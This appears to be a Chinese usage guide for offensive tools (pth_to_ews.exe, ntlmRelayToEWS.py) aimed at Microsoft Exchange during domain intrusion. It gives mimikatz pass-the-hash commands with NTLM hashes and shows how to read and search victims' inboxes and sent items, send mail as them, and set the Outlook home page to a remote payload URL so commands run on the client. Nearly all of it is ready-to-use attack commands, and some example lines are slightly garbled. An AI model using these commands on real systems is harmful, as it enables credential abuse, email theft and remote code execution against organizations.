ntlmv1 ntlmv2 hash获取需配合unc路径触发
ntlmRelayToEWS.py -t https://mail.xxx.net/EWS/exchange.asmx -r setHomePage -f inbox -u http://test.org/cacheimg/xxxxxxxxxxxxxxxxx.html
代码中使用exchange自动发现协议,利用autodiscover/autodiscover.xml来查找相关接口,有些公司exchange邮件服务器并未启用autodiscover
不考虑relay中继的情况下 ,解决在域渗透过程中,ntds.dit抓出来的ntlm hash解不出来明文, 无法登陆exchange owa查看邮件。
利用指定exchange的ews接口 用mimikatz pth后,可直接操作收发邮件,以及通过修改设置outlook-home-Url 在outlook客户端所属win客户端执行命令
使用说明:
tips:可以使用mimikatz 进行ntlm pth 然后即可使用其他用户凭据进行发送邮件
mimikatz.exe privilege::debug "sekurlsa::pth /user:xxxxxxx-hr /domain:corp.xxx.net /ntlm:e00cae2eee1977cec78e888888888888 /run:cmd" exit
mimikatz.exe privilege::debug "sekurlsa::pth /user:xxxxxxxxxxxx-it /domain:corp.xxx.net /ntlm:72abd45c3af888888963e86d9c888888 /run:cmd" exit
使用默认凭证发送邮件, html.txt 为自定义的正文内容 支持html格式
pth_to_ews.exe https://sb/ews/exchange.asmx -Sendmail -T "sbsbsbsb" -TM 123123@qq.com -B HTML.txt
使用账号密码发送邮件
pth_to_ews.exe https://sb/ews/exchange.asmx -U sb@sb.net -P ddddd!@#$ -Sendmail -T "你好" -TM sb@test.cn -B HTML.txt
使用默认凭证收取 收件箱邮件
pth_to_ews.exe https://sb/ews/exchange.asmx -MType Inbox //保存在目录下的inbox文件夹中为eml格式
使用默认凭证收取SentItems邮件
pth_to_ews.exe https://sb/ews/exchange.asmx -MType SentItems
使用默认凭证收取邮件 检索关键字vpn
pth_to_ews.exe https://mail.xxx.net/ews/exchange.asmx -MType SentItems -Filterstring "vpn"
使用账号密码收取邮件
pth_to_ews.exe https://sb/ews/exchange.asmx -U sb@sb.net -P xxxx!@#$ -MType Inbox
使用账号密码收取邮件 检索关键字vpn
pth_to_ews.exe https://sb/ews/exchange.asmx -U sb@sb.net -P ssss!@#$ -MType Inbox -Filterstring vpn
使用默认凭证验证ews接口设置outlook 客户端主页,url为远程pyloadurl,html里面写payload。
homepage的文章 https://sensepost.com/blog/2017/outlook-home-page-another-ruler-vector/
pth_to_ews.exe https://mailxxxo.net/ews/exchange.asmx -Purl http://www.test.org/cacheimg/ceshi.html -Type Set
Reset参数为删除设置outlook 客户端主页
pth_to_ews.exe https://maxxx.net/ews/exchange.asmx -Purl http://www.test.org/cacheimg/ceshi.html -Type Set
使用账号密码设置outlook 客户端主页url,url为远程pyloadurl,html里面写payload
pth_to_ews.exe https://mail.xxx..net/ews/exchange.asmx -U i-xxxx@xxx.xxxx.xxx -P xxxx!@#$% -Purl http://www.test.org/cacheimg/ceshi.htmll -Type Set